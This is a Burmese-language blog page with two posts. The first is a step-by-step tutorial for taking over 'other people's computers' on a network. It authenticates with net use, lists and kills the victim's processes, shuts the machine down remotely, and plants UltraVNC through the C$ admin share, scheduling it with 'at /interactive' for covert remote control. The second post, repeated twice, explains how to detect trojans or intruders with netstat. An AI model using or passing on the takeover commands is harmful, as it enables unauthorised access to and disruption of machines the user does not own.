net use command line ကို အသံုးျပဳျပီး သူမ်ားကြန္ပ်ဴတာေတြကို ေျပာင္းျပစ္ႏိုင္တဲ့နည္းလမ္းေလးျဖစ္ပါတယ္။
ဒီနည္းကိုအသံုးျပဳမယ္ဆိုရင္ အျခားကြန္ပ်ဴတာရဲ႕ IP, user name သိထားဖို႔လိုပါတယ္။ ကြန္ပ်ဴတာရဲ႕ IP, user
name ေတြကို သိထားျပီးဆိုရင္ net use ကို အသံုးျပဳျပီး အျခားကြန္ပ်ဴတာရဲ႕ run ထားတဲ့ program ေတြကို
လွမ္းပိတ္တာတို႔လုပ္လို႔ရမွာျဖစ္ပါတယ္။ ဒါေၾကာင့္ မသိေသးေသာပုဂၢိဳလ္မ်ားအတြက္ နည္းလမ္းသိေအာင္ဆိုျပီး က်ေနာ္
ဒီပို႔စ္ကိုတင္လိုက္တာပါ။ နည္းသိေအာင္သက္သက္သာျဖစ္ပါတယ္။
ကဲ...ေအာက္ပါ net use ကိုအသံုးျပဳျပီး အျခားကြန္ပ်ဴတာမ်ားျပဳျပင္ႏိုင္တဲ့နည္း
ဘာမွမလုပ္ခင္ အရင္ဦးဆံုး
ဒီပာာကို cmd မွာအရင္ရုိက္လိုက္ပါ။
net use \\(ip) /u:(accountname)
password ေတာင္းရင္ရုိက္ေပးလိုက္ပါ။
command successfully ဆိုတာက်လာပါလိမ့္မယ္။
e.g
net use \\1.1.1.1 /u:admin
ေပါ့
ကဲစျပီဘာေတြလုပ္လို႔ရမလဲဆိုတာ
ေအာက္မွာျပထားတယ္ေနာ္။
သူ႔စက္မွာ ဘာေတြrun ထားလဲၾကည့္မယ္
tasklist /s (ip)
e.g tasklist /s 1.1.1.1
ပါ
သူ႔စက္မွာ run ထားတာေတြကုိလွမ္းပိတ္မယ္ဗ်ာ။
taskkill /s (ip ) /f /im (program name)
e.g taskkill /s 1.1.1.1 /f /im notepad.exe
သူ႔စက္ကို လွမး္ျပီးေတာ့ shutdown ခ်မယ္။
shutdown -m \\(ip) -s -t 1500 -c "(command)"
e.g shutdown -m \\1.1.1.1 -s -t 1500 -c "bye bye see u later"
ေပါ့။
ျပီးေတာ့သူ႔ဆီကို ကို္ယ့္ဘက္ကsoftware လွမ္းrun မယ္။
အဲဒီေကာင္က်ေတာ့အဆင့္မ်ားသြားျပီ။
vnc ေလးလွမ္းrun မယ္ဆုိပါေတာ့။
သင့္စက္မွာvnc တင္ျပီးသားဆုိပါေတာ့။
vnc တင္ထားတဲ့ေနရာကိုသြားျပီးေတာ့
vnc တင္ထားတဲ့ေနရာက programfiles ထဲမွာ
ျဖစ္ဖို႔မ်ားပါတယ္ ။
အဲ့ဒီဖိုဒါကိုဒီလုိကူးပါ။
ပာုိဘက္စက္ထဲကိုိ
vnc foldername ကိုultravnc ပဲဆိုပါေတာ့
သင့္အေနနဲ႔cmd နဲ႔ c:\program files ေအာက္ကိုသြားပါ။ဒီအတုိင္းေပါ့
cd c:\program files ဆိုျပီးရုိက္လုိက္ပါ။
ျပီးရင္ copy ultravnc \\ip\c$ ေပါ့
e.g copy ultravnc \1.1.1.1\c$
လို႔ရုိက္လုိက္ပါ။
1 file(s) copied.
ဆိုတာက်လာပါမယ္ျပီးရင္
copy \\1.1.1.1\c$\ultravnc\winvnc.exe(vncserver exe ကိုဆိုလိုတာပါ။) \\1.1.1.1\c$\system32\winvnc.exe
လို႔ရိုက္လိုက္ပါ။
သတိ-1.1.1.1 ေနရာမွာေတာ့ သင္ပာက္မယ့္စက္ရဲ ့အုိင္ပီကိုထည့္ေပါ့ေနာ္။
ျပီးရင္
ဒီcommand နဲ႔ run ပါ။
at \\ip time(သူ႔စက္ရဲ ့အခ်ိန္ပါ။သူ႔စက္ရဲ ့အခ်ိန္ထက္ တစ္မိနစ္ေလာက္ေစာျပီးေတာ့ေပးေပါ့ေနာ္။) /interactive programfile
e.g at \\1.1.1.1 1:07am(amႏွင့္ pm ေတြမက်န္ခဲ့ပါေစနဲ႔) /interactive "winvnc.exe"(ဒီမွာေတာ့ vnc ကိုပဲrun ျပလုိက္ပါတယ္။)
အဲ့ဒါဆိုရင္
1:07 am က်ရင္ vnc software ကသူ႔ဆီမွာ run ေနပါလိမ့္မယ္။
အဲ့ဒီအခါက်ရင္ ကိုယ့္ဆီကေန လွမ္းျပီးေတာ့ကလိလို႔ရပါလိမ့္မယ္။
SHARE LINK http://www.sawlinux.org/2010/10/net-use-cmd.html
Apr 1, 2014
Netstat (CMD) ကိုအသံုးျပဳျပီး အႏၱရာယ္ေပးသူကိုေျခရာခံနည္း
နည္းပညာပိုင္းဆိုတာ သိသင့္သထိုက္လို႔တင္ျပေပးတဲ့သေဘာပါ။
ကိုယ့္မွာမသိတာေလးေတြရွိရင္ သိလာေအာင္။ သိျပီးသားဆိုလည္း ပိုသိလာေအာင္ေပါ့။
က်ေနာ္ကေတာ့ ဟက္ကင္း၊ဟက္ကာေတြဆို ဘာကိုဘာမွမသိဘူး။ လိုင္း ေတြကမ်ားတယ္ေလ
ဘယ္လိုင္းကိုအဓိကထားလိုက္မလဲေပါ့။ ဒါကိုကိုယ့္ကိုသိရမယ္။
အဆင့္ျမင့္နည္းပညာတစ္ခု ကိုလိုက္မယ္ဆိုရင္ အသက္အရြယ္လဲရိွမယ္။
အားထုတ္ၾကိဳးပမ္းလဲေကာင္းတယ္ဆိုရင္ ဒီပညာရပ္ပိုင္းေတြကိုရႏိုင္ ပါတယ္။
ဒါေပမယ့္ ဘယ္ပညာရပ္မဆို အသံုးခ်တတ္ဖို႔ပဲလိုတယ္။ ဒီေတာ့ပစ္သည္လဲ
အတိုင္းတာတစ္ခုထိအက်ိဳး ရွိပါတယ္။ ဖတ္ၾကည့္ပါ။ ေရးရတာပ်င္းတာနဲ႔
သူမ်ားေရးျပီးသားကိုပဲယူသံုးလိုက္တယ္။
မိမိကြန္ပ်ဴတာထဲမွာ ထ႐ိုဂ်န္ (Trojan) ဒါမွမဟုတ္ ဟက္ကာတစ္ေယာက္ေယာက္ ၀င္ေရာက္ေနမႈ ရွိမရွိ အလြယ္တကူ ရွာေဖြ ေဖာ္ထုတ္ႏိုင္မယ့္ နည္းေကာင္းတစ္ခုကို ဒီတစ္ပတ္အိုင္တီဗဟုသုတအျဖစ္ ေဖာ္ျပလိုက္ပါတယ္။
ကြန္ပ်ဴတာမွာ ထ႐ိုဂ်န္လို႔ေခၚတဲ့ ကြန္ပ်ဴတာဗိုင္းရပ္စ္ပဲျဖစ္ျဖစ္၊ ဟက္ကာပဲ ျဖစ္ျဖစ္ ၀င္ေရာက္ေနၿပီဆိုရင္ စက္ဟာ ေႏွးေကြး လာပါလိမ့္မယ္။
ဘာေၾကာင့္လဲဆိုေတာ့ ထ႐ိုဂ်န္ေတြ၊ ဟက္ကာေတြက မိမိကြန္ပ်ဴတာကေန မိမိေရာက္လိုတဲ့ ကြန္ပ်ဴတာ (သို႔မဟုတ္) ဆာဗာေတြ ဆီကို အင္တာနက္ကေန လွမ္းၿပီး ခ်ိတ္ဆက္ေနလို႔ျဖစ္ပါတယ္။
ဒီလို၀င္ထြက္ႏိုင္ဖို႔ ၀င္ေပါက္ထြက္ေပါက္ (Port) နဲ႔ ခ်ိတ္ဆက္မႈလမ္း (Protocol) တစ္ခုခုကို အသံုးျပဳရပါတယ္။
အမ်ားဆံုး အသံုးျပဳတာက Transmission Control Protocol (TCP) ခ်ိတ္ဆက္မႈ လမ္းေၾကာင္းကို အသံုးျပဳတတ္ပါတယ္။
ပံုမွန္၀င္ေပါက္ထြက္ေပါက္ နံပါတ္ေတြက သုညကေန 1023 အတြင္းမွာရွိေပမယ့္ ထ႐ိုဂ်န္နဲ႔ တျခားေဆာ့ဖ္၀ဲေတြက Port 1024 ကေန 49151 အတြင္းမွာ အသံုးျပဳၾကပါတယ္။
ဒါကို ေဖာ္ထုတ္ႏိုင္ဖို႔ ၀င္းဒိုးမွာ အလိုအေလ်ာက္ပါ၀င္တဲ့ Netstat Tools ကို အသံုးျပဳမွာျဖစ္ပါတယ္။
အရင္ဆံုး အင္တာနက္အသံုးျပဳေနရင္ Browser အားလံုးနဲ႔ Software ေတြကို ပိတ္လိုက္ပါ။ Windows Key+R ကိုႏွိပ္ပါ။
Run box ေလးေပၚလာပါလိမ့္မယ္။
CMD လို႔႐ိုက္ထည့္ၿပီး Enter ႏွိပ္ပါ။ Command Prompt ကို ေရာက္သြားပါ့မယ္။
အရင္ဆံုး မိမိကြန္ပ်ဴတာကေန အျပင္ကို ဘာေတြထြက္ေနလဲဆိုတာ ေလ့လာပါ့မယ္။ Command Prompt မွာ Netstat -a လို႔ ႐ိုက္ထည့္ၿပီး Enter ေခါက္လိုက္ပါတယ္။
စာတန္းအရွည္ႀကီးထြက္လာပါလိမ့္မယ္။ ပံုမွာၾကည့္ပါ။
ဆက္ေၾကာင္းတစ္ခုဟု မိမိစက္ကေန အျပင္ IP တစ္ခုကို ထြက္ေနတာ ေတြ႕ရပါလိမ့္မယ္။
ကြန္ပ်ဴတာမွာ ေဆာ့ဖ္၀ဲနဲ႔ Browser ေတြအကုန္ပိတ္ထားေပမယ့္ TCP ဆက္ေၾကာင္းကေနထြက္ေနတာျဖစ္ပါတယ္။
Port ေတြကို နံပါတ္နဲ႔ ျမင္ခ်င္ရင္ Netstat -an လို႔႐ိုက္ထည့္ၿပီး ၾကည့္ပါ။
မိမိကြန္ပ်ဴတာမွာရွိတဲ့ ပ႐ိုဂရမ္တစ္ခုခုက အင္တာနက္ Connection ယူၿပီး အျပင္ကို ထြက္ေနသလားသိခ်င္ရင္ Netstat -bn လို႔ Command Prompt မွာ ႐ိုက္ထည့္ၿပီး သံုးၾကည့္ပါ။
ေအာက္ေဖာ္ျပပါပံုမွာ avp.exe ပ႐ိုဂရမ္က အျပင္ IP နံပါတ္ 74.125.236.85 ကို Port နံပါတ္ 443 ကို အသံုးျပဳၿပီး TCP ဆက္ေၾကာင္းကေန ထြက္ေနတာျဖစ္ပါတယ္။
ဒါေၾကာင့္ ဘယ္သူေတြ ဘယ္ပ႐ိုဂရမ္ေတြက အျပင္ကို အင္တာနက္ကေနတစ္ဆင့္ ၀င္ေနထြက္ေနသလဲဆိုတာ Netstat ကို အသံုးျပဳၿပီး ရွာေဖြႏိုင္ပါေၾကာင္း ေဖာ္ျပလိုက္ပါတယ္။
ref : http://thangmuallamka.multiply.com/journal/item/95
မိမိကြန္ပ်ဴတာထဲမွာ ထ႐ိုဂ်န္ (Trojan) ဒါမွမဟုတ္ ဟက္ကာတစ္ေယာက္ေယာက္ ၀င္ေရာက္ေနမႈ ရွိမရွိ အလြယ္တကူ ရွာေဖြ ေဖာ္ထုတ္ႏိုင္မယ့္ နည္းေကာင္းတစ္ခုကို ဒီတစ္ပတ္အိုင္တီဗဟုသုတအျဖစ္ ေဖာ္ျပလိုက္ပါတယ္။
ကြန္ပ်ဴတာမွာ ထ႐ိုဂ်န္လို႔ေခၚတဲ့ ကြန္ပ်ဴတာဗိုင္းရပ္စ္ပဲျဖစ္ျဖစ္၊ ဟက္ကာပဲ ျဖစ္ျဖစ္ ၀င္ေရာက္ေနၿပီဆိုရင္ စက္ဟာ ေႏွးေကြး လာပါလိမ့္မယ္။
ဘာေၾကာင့္လဲဆိုေတာ့ ထ႐ိုဂ်န္ေတြ၊ ဟက္ကာေတြက မိမိကြန္ပ်ဴတာကေန မိမိေရာက္လိုတဲ့ ကြန္ပ်ဴတာ (သို႔မဟုတ္) ဆာဗာေတြ ဆီကို အင္တာနက္ကေန လွမ္းၿပီး ခ်ိတ္ဆက္ေနလို႔ျဖစ္ပါတယ္။
ဒီလို၀င္ထြက္ႏိုင္ဖို႔ ၀င္ေပါက္ထြက္ေပါက္ (Port) နဲ႔ ခ်ိတ္ဆက္မႈလမ္း (Protocol) တစ္ခုခုကို အသံုးျပဳရပါတယ္။
အမ်ားဆံုး အသံုးျပဳတာက Transmission Control Protocol (TCP) ခ်ိတ္ဆက္မႈ လမ္းေၾကာင္းကို အသံုးျပဳတတ္ပါတယ္။
ပံုမွန္၀င္ေပါက္ထြက္ေပါက္ နံပါတ္ေတြက သုညကေန 1023 အတြင္းမွာရွိေပမယ့္ ထ႐ိုဂ်န္နဲ႔ တျခားေဆာ့ဖ္၀ဲေတြက Port 1024 ကေန 49151 အတြင္းမွာ အသံုးျပဳၾကပါတယ္။
ဒါကို ေဖာ္ထုတ္ႏိုင္ဖို႔ ၀င္းဒိုးမွာ အလိုအေလ်ာက္ပါ၀င္တဲ့ Netstat Tools ကို အသံုးျပဳမွာျဖစ္ပါတယ္။
အရင္ဆံုး အင္တာနက္အသံုးျပဳေနရင္ Browser အားလံုးနဲ႔ Software ေတြကို ပိတ္လိုက္ပါ။ Windows Key+R ကိုႏွိပ္ပါ။
Run box ေလးေပၚလာပါလိမ့္မယ္။
CMD လို႔႐ိုက္ထည့္ၿပီး Enter ႏွိပ္ပါ။ Command Prompt ကို ေရာက္သြားပါ့မယ္။
အရင္ဆံုး မိမိကြန္ပ်ဴတာကေန အျပင္ကို ဘာေတြထြက္ေနလဲဆိုတာ ေလ့လာပါ့မယ္။ Command Prompt မွာ Netstat -a လို႔ ႐ိုက္ထည့္ၿပီး Enter ေခါက္လိုက္ပါတယ္။
စာတန္းအရွည္ႀကီးထြက္လာပါလိမ့္မယ္။ ပံုမွာၾကည့္ပါ။
ဆက္ေၾကာင္းတစ္ခုဟု မိမိစက္ကေန အျပင္ IP တစ္ခုကို ထြက္ေနတာ ေတြ႕ရပါလိမ့္မယ္။
ကြန္ပ်ဴတာမွာ ေဆာ့ဖ္၀ဲနဲ႔ Browser ေတြအကုန္ပိတ္ထားေပမယ့္ TCP ဆက္ေၾကာင္းကေနထြက္ေနတာျဖစ္ပါတယ္။
Port ေတြကို နံပါတ္နဲ႔ ျမင္ခ်င္ရင္ Netstat -an လို႔႐ိုက္ထည့္ၿပီး ၾကည့္ပါ။
မိမိကြန္ပ်ဴတာမွာရွိတဲ့ ပ႐ိုဂရမ္တစ္ခုခုက အင္တာနက္ Connection ယူၿပီး အျပင္ကို ထြက္ေနသလားသိခ်င္ရင္ Netstat -bn လို႔ Command Prompt မွာ ႐ိုက္ထည့္ၿပီး သံုးၾကည့္ပါ။
ေအာက္ေဖာ္ျပပါပံုမွာ avp.exe ပ႐ိုဂရမ္က အျပင္ IP နံပါတ္ 74.125.236.85 ကို Port နံပါတ္ 443 ကို အသံုးျပဳၿပီး TCP ဆက္ေၾကာင္းကေန ထြက္ေနတာျဖစ္ပါတယ္။
ဒါေၾကာင့္ ဘယ္သူေတြ ဘယ္ပ႐ိုဂရမ္ေတြက အျပင္ကို အင္တာနက္ကေနတစ္ဆင့္ ၀င္ေနထြက္ေနသလဲဆိုတာ Netstat ကို အသံုးျပဳၿပီး ရွာေဖြႏိုင္ပါေၾကာင္း ေဖာ္ျပလိုက္ပါတယ္။
ref : http://thangmuallamka.multiply.com/journal/item/95
Subscribe to:
Posts (Atom)